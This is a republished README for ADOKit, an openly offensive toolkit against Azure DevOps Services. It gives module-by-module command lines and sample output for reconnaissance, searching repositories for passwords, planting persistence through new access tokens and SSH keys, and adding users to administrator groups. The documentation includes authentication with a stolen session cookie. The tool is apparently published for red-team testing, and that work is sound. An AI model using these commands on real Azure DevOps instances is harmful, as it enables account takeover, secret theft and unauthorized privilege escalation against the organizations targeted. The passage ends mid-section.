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ADOKit - Azure DevOps Services Attack Toolkit

By: Zion3R β€” April 6th 2024 at 11:30

Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Fody MIT License
Newtonsoft.Json MIT License


  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!

Command Modules

  • Recon
  • check - Check whether organization uses Azure DevOps and if credentials are valid
  • whoami - List the current user and its group memberships
  • listrepo - List all repositories
  • searchrepo - Search for given repository
  • listproject - List all projects
  • searchproject - Search for given project
  • searchcode - Search for code containing a search term
  • searchfile - Search for file based on a search term
  • listuser - List users
  • searchuser - Search for a given user
  • listgroup - List groups
  • searchgroup - Search for a given group
  • getgroupmembers - List all group members for a given group
  • getpermissions - Get the permissions for who has access to a given project
  • Persistence
  • createpat - Create personal access token for user
  • listpat - List personal access tokens for user
  • removepat - Remove personal access token for user
  • createsshkey - Create public SSH key for user
  • listsshkey - List public SSH keys for user
  • removesshkey - Remove public SSH key for user
  • Privilege Escalation
  • addprojectadmin - Add a user to the "Project Administrators" for a given project
  • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
  • addbuildadmin - Add a user to the "Build Administrators" group for a given project
  • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
  • addcollectionadmin - Add a user to the "Project Collection Administrators" group
  • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
  • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
  • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
  • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
  • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
  • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
  • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
  • getpipelinevars - Retrieve any pipeline variables used for a given project.
  • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
  • getserviceconnections - Retrieve the service connections used for a given project.


  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the domain.
  • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
  • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario Module Special Permissions? Notes
Recon check No
Recon whoami No
Recon listrepo No
Recon searchrepo No
Recon listproject No
Recon searchproject No
Recon searchcode No
Recon searchfile No
Recon listuser No
Recon searchuser No
Recon listgroup No
Recon searchgroup No
Recon getgroupmembers No
Recon getpermissions No
Persistence createpat No
Persistence listpat No
Persistence removepat No
Persistence createsshkey No
Persistence listsshkey No
Persistence removesshkey No
Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts


Validate Azure DevOps Access

Use Case

Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.


Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:

Module: check
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 3/28/2023 3:33:01 PM

[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check


Use Case

Get the current user and the user's group memberhips


Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

ADOKit.exe whoami /credential:apiKey /url:

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:

Module: whoami
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 11:33:12 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com

[*] INFO: Listing group memberships for the current user

Group UPN | Display Name | Description
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami

List Repos

Use Case

Discover repositories being used in Azure DevOps instance


Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:

Module: listrepo
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 3/29/2023 8:41:50 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
TestProject2 |
MaraudersMap |
SomeOtherRepo | tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo |
ProjectWithMultipleRepos |
TestProject |

3/29/23 12:41:53 Finished execution of listrepo

Search Repos

Use Case

Search for repositories by repository name in Azure DevOps instance


Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url: /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url: /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url: /search:"test"

Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL:

Timestamp: 3/29/2023 9:26:57 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
TestProject2 |
TestProject |

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in Azure DevOps instance


Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:

Module: listproject
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/4/2023 7:44:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
TestProject2 | private |
MaraudersMap | private |
ProjectWithMultipleRepos | private | http s://
TestProject | private |

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in Azure DevOps instance


Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url: /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url: /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url: /search:"map"

Module: searchproject
Auth Type: API Key
Search Term: map
Target URL:

Timestamp: 4/4/2023 7:45:30 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
MaraudersMap | private |

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in Azure DevOps instance


Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url: /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url: /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url: /search:"password"

Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL:

Timestamp: 3/29/2023 3:22:21 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[>] URL:
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL:
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchco de

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in Azure DevOps


Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url: /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url: /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url: /search:"test"

Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL:

Timestamp: 3/29/2023 11:28:34 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
---------------------------------------------------------------------------------------------------- s

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.


Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:

Module: createpat
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 3/31/2023 2:33:09 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.


Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

ADOKit.exe listpat /credential:apiKey /url:

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:

Module: listpat
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 3/31/2023 2:33:17 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.


Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url: /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url: /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url: /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

Module: removepat
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 11:04:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.


Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url: /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url: /sshkey:"ssh-rsa ABC123"

Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 2:51:22 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.


Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:

Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 11:37:10 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.


Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url: /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url: /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url: /id:a199c036-d7ed-4848-aae8-2397470aff97

Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 1:50:08 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance


Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:

Module: listuser
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:12:07 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
user1 | User 1 |
jsmith | John Smith |
rsmith | Ron Smith |
user2 | User 2 |

4/3/23 20:12:08 Finished execution of listuser

Search User

Use Case

Search for given user(s) in Azure DevOps instance


Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url: /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url: /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url: /search:"user"

Module: searchuser
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:12:23 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
user1 | User 1 | user1@YourOrganization.onmic
user2 | User 2 |

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance


Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

ADOKit.exe listgroup /credential:apiKey /url:

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:

Module: listgroup
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:48:45 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in Azure DevOps instance


Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

ADOKit.exe searchgroup /credential:apiKey /url: /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url: /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url: /search:"admin"

Module: searchgroup
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:48:41 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group


Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url: /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url: /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url: /group:"admin"

Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 9:11:03 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
[TestProject2]\Build Administrators | | User 1
[TestProject2]\Build Administrators | | User 2
[MaraudersMap]\Project Administrators | | Brett Hawkins
[MaraudersMap]\Project Administrators | | Ron Smith
[TestProject2]\Project Administrators | | User 1
[TestProject2]\Project Administrators | | User 2
[YourOrganization]\Project Collection Administrators | | John Smith
[ProjectWithMultipleRepos]\Project Administrators | | Brett Hawkins
[MaraudersMap]\Build Administrators | | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.


Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url: /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url: /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 9:11:16 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.

[*] INFO: List ing group members for each group that has permissions to this project

GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name

GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
[MaraudersMap]\Contributo rs | | User 1
[MaraudersMap]\Contributors | | User 2

GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
[MaraudersMap]\MaraudersMap Team | | Brett Hawkins

GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
[MaraudersMap]\Project Administrators | | Brett Hawkins

GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name

GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
[MaraudersMap]\Readers | | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.


Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 2:52:45 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | | Brett Hawkins
[MaraudersMap]\Project Administrators | | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.


Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 3:19:43 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.


Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 3:41:51 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.


Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 3:42:10 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.


Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url: /user:"someUser"

